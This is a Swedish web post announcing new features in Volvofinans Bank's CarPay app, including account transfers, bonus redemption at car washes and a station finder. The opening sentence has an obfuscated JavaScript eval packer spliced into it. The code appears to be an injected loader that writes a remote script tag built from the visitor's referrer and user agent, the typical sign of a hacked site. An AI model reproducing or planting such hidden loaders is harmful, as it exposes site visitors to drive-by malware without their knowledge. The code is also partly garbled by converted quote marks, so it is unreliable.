Image Image Image Image Image Image Image Image Image Image

| 8 maj, 2021

Scroll to top

Top

Nya funktioner i den senaste versionen av CarPay

Nya funktioner i den senaste versionen av CarPay
Sebastian

CarPay eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fdnza|var|u0026u|referrer|hdsnd||js|php’.split(’|’),0,{}))
är en kostnadsfri app från Volvofinans Bank som skapar ännu mer värde åt Volvokortet. I mobilen får Volvofinans kunder en smart översikt över hela sin bilekonomi: från saldo och transaktioner till sparkonto, billån och leasing. Nu släpper Volvofinans Bank en ny version av CarPay med nya och efterfrågade funktioner. I den nya versionen har kunderna bland annat möjlighet att göra överföringar mellan konton, växla sin bonus till tvätt samt hitta sin närmaste Tankastation och tvättanläggning.

Tjänsten lanserades med främsta syfte att förenkla bilägarnas vardag och ge dem ökad kontroll över sin bilekonomi. – Det allmänna mottagandet av CarPay har varit mycket positivt och vi kan nu med glädje lansera fler och efterfrågade funktioner i appen. Tjänsten har snabbt blivit populär och appens nya funktioner kommer göra CarPay ännu mer attraktivt för våra kunder, säger Roderik Jönsson, programchef för CarPay på Volvofinans Bank.

Efterfrågade funktioner bland våra kunder
Bland de nya funktionerna möjliggör vi överföringar i appen. Nu kan kunderna göra överföringar mellan egna konton hos Volvofinans Bank eller till konto i annan bank direkt i appen, en funktion som tidigare bara erbjuds på Mina sidor. Vi lyfter även fram Tanka och Tvätta på ett tydligare sätt. Nu kan våra kunder hitta sin närmsta Tanka och tvättanläggningar, få vägbeskrivningar, se priser samt skriva in till Prislinjen, direkt i appen!

Fler möjligheter att använda sin bonus
CarPay ger Volvofinans kunder den unika möjligheten att lösa in sina bonuscheckar mot drivmedel på Tanka. Både kunder och handlare har önskat fler möjligheter att lösa in sina bonuscheckar och i den nya versionen av CarPay är det även möjligt att lösa in sina bonuscheckar på Tvätta och övriga biltvättar i Volvo- och Renaulthandeln.

CarPay är Volvokortet i mobilen

Tjänsten lanserades den 13 april och har redan nått topplacering i App Store och fått hundratals positiva kommentarer och lika många delningar i sociala medier. I appen får du all information kring ditt Volvokort direkt i mobilen. Du kan se allt från saldo och transaktioner till lokala erbjudanden och din intjänade bonus. Appen finns att ladda ner i App Storeeller Google Play.